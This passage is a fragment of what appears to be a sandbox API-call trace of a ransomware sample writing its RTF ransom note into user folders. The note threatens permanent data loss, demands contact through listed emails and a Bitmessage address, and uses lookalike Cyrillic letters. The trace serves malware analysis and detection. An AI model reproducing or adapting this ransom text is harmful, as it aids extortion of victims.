ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.347] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.348] CloseHandle (hObject=0x294) returned 1 [0272.348] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0272.348] GetLastError () returned 0x2 [0272.348] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 